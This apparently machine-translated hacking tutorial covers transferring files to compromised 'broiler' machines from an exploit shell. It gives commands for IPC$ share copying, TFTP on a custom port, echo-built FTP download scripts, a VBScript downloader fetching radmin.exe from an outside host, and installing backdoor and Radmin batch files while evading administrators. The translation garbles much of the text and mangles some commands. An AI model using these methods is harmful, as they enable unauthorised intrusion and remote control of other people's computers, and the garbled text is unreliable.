1. The first thing to say is that beginners' favorite IPC $ sharing way, usage is simple. First create an account account in the overflow shell, and then connect with the broiler under the local CMD, the command is as follows:
NET USE / IP / Shared Directory (Behind Big $) "Password" / user: "User Name" COPY C: / File / IP / Shared Directory here again, do you have thought that we can also pass broiler? To invade our own machine, the purpose of transmitting the document is only changed to download. The back command is changed to COPY / your IP / shared directory / file C: / file
Everyone can learn according to this idea. Friends who played MS03-049 know that this overflow needs 139,445 ports, so as long as the overflows are successfully mapped to the local, so they are left, and the command is as follows:
NET USE Z: / IP / Shared Content If the other party closes the default sharing You can open with the NET Share command in the overflow shell, and remember to disconnect after the file, the command: NE Use z: / IP / shared directory / DEL
2. Then we say that many friends have used TFTP mode. First, you have to have a public IP, then go online down a TFTPD32.exe, run it in the directory of the file you want to transfer. It is OK. Run the command under the overflow shell: TFTP -I Your IP get XX.exe This completes the transfer of files, when the administrator restricts the transfer file, generally directly seal 69 port, modify the default 69 port, TFTPD32.exe, etc. The TFTP server is to set the port yourself, not much here, just restart the TFTP server after setting. As for the client
There is a Services file under the System32 / Drivers / etc / folder. Open the following: # Copyright? 1993-1999 Microsoft Corp. # # this file contacts port numbers for well-known services defined by iana # # Format: # #
Echo 7 / TCP Echo 7 / UDP Discard 9 / TCP Sink Null Discard 9 / UDP Sink Null System 11 / TCP Users #Active Users Systat 11 / TCP Uses #AcTive Users ... TFTP 69 / UDP # confir file transfer ... It is not difficult to see that 69 / udp is to define the TFTP default port, the protocol is UDP. Specifically, as long as these two sentences, it is actually more modified than the original: ECHO TFTP 8300 / UDP>% systemroot% / system32 / drivers / etc / services tftp -i xxx.xxx.xxx.xxx Get Srv.exe Note: Please set the TFTP server port to be the same as the custom port, here is 8300. Safety points: ren% systemroot% / system32 / drivers / etc / services 1 echo tftp 8300 / udp> 2 Copy 2 % systemroot% / system32 / drivers / etc% systemroot% / system32 / drivers / etc / services
Of course, this method is not successful every time, the firewall and administrator's anti-black setting will make your file transfer failed. So don't worry about a dead end, there is a saying, and the road is a road to Rome. 3. Here we continue to say ftp mode, you have to play with overflow. If you use an FTP command to enter the server with an FTP command to enter the user name, you will be paused there in a false dead condition. . So everyone is usually a Telnet service that opens broilers, connects to the FTP server to transfer files after connecting. Or write the script on broiler, command as follows: Echo ftp> 1.txt echo open xxx.xxx.xxx.xxx> 1.txt echo user >> 1.txt echo pass >> 1.txt echo bin >> 1. TXT Echo Get Aoqi.rar >> 1.txt Echo Bye >> 1.txt ftp -s: 1.Txt FTP-S: 1.txt can be downloaded.
FTP custom port actually ftp custom port is very simple, as long as the IP address is spaced behind, it can be kept with the custom port, as follows: echo open xxx.xxx.xxx.xxx 2121> ftp.txt echo user >> FTP .txt echo password >> ftp.txt echo bin >> ftp.txt [optional] echo get aoqi.rar >> ftp.txt echo bye >> ftp.txt
ftp -s: ftp.txt Here the custom port is 2121, as long as the port of the FTP server is uniform
Now, how to use the FTP transfer file directly under the overflow shell without the script to complete. I have two ways to be known: One is to set your FTP server to anonymous access, so you can download it directly to the server directly to the server. Second, set your FTP's account password to empty, but the FTP server in this setting has a risk. Everyone remember to set the permissions to only download or change the ftp port. You can download it by the following: C : / Winnt / System32> FTP FTP Open XXX.kmip.net User (Danne.kmip.net: (None)): 1 bin get 2.exe Bye
C: / Winnt / System32> Aoqi.exe //aoqi.exe is a self-despiced compression package 2.exe
C: / Winnt / System32> DIR 1.BAT //1.bat is the rear door automatic installation batch DIR 1. The volume in the BAT drive C does not have a label. The serial number of the volume is 1001-8227
C: / winnt / system32 directory
Can't find the file / / I don't know why I first find the file after the first time I can't find it.
C: / Winnt / System32> Dir 2.bat //2.bat is the RADMIN Automatic Installation Batch DIR 2.BAT Drive C has no label. The serial number of the volume is 1001-8227
C: / winnt / system32 directory
2004-05-01 13:04 85 2.BAT 1 file 85 bytes 0 directory 4, 735, 807, 488 available bytes
There is 99% of the success rate, and I have always used it ~ Recommended, just need to set up an FTP server, can be put on your machine, or broiler, we have to make full use of broiler (more words, The broiler should be regularly maintained, diligently cheer, don't get grouped or found by the administrator) ~ If you don't have FTP, I can provide.
4. Write program download scripts is very good, just save the source code to a file. So under the shell, write it directly to a file with the ECHO statement, and execute it with the corresponding interpretation program. Here is a simplification of a program example: echo set xpost = creteObject ("Microsoft.xmlhttp")> Iget.vbe echo xpost.open "get", "http://softworks.512j.com/radmin.exe", 0> > igt.vbeecho xpost.send () >> Iget.vbeecho set sget = createObject ("adod.stream" >> iget.vbeecho sget.mode = 3 >> iGet.vbeecho sget.type = 1 >> Iget.vbe echo sget.open () >> iget.vbeecho sget.write (xpost.responsebody) >> Iget.vbeecho sget.savetofile "Radmin.exe", 2 >> Iget.vbe then execute CScript 167168.vbs can be. Http: //167168.meibu.com/srv.exe changed to the website path where you put the file, Srv.exe can change to the path to save the file. 5.Start ITS: http://167168.meibu.com/ca.rar (see clearly, beware of the tab) CD "C: / Documents and settings / default user / local settings / tempt user / local settings / temporary Internet files / content. IE5 / "(assuming the system is installed in the C disk, and the current environment is system. If it is a user environment, modify the default user is the username) DIR / S CA [1] .rar then display CA [1] .rar Location, such as C: / Documents and Settings / DEFAULT USER / LOCAL SETTINGS / TEMPORARY Internet files / content.ie5qmvc11h / ca [1] .rar final: COPY 0QMVC11H / CA [1] .rar C: / Winnt / System32 / CA. RAR DEL 0QMVC11H / CA [1] .rar
Summarize these five conventional methods, in fact, there are still some unconventional methods. For example, use the Dame Ware remote control tool to remotely with its file transfer function. Here I don't say it. ~ Generally, I believe that the transfer file is not a problem. If you have other methods, you can also tell you about http://167168.kmip.net.
######################################################################################################################################################################################################################################################################################################## ################################### igt.vbe script code.
SET XPOST = CreateObject ("Microsoft.xmlhttp") xPost.Open "get", "http://softworks.512j.com/radmin.exe", 0 xpost.send () set sget = createObject ("AdoDb.Stream" Sget.mode = 3 sget.type = 1 sget.open () sget.write (xpost.responsebody) sget.savetofile "Radmin.exe", 2 #################### ####################### ield = lcase (wscript.arguments (1)) iremote = lcase (WScript.Arguments (0 )) SET XPOST = CreateObject ("Microsoft.xmlhttp") xPost.Open "get", IRemote, 0 xpost.send () set sget = creteObject ("adodb.stream" sget.mode = 3 sget.type = 1 sget .Open () sget.write (xpost.responsebody) sget.savetofile iLocal, 2
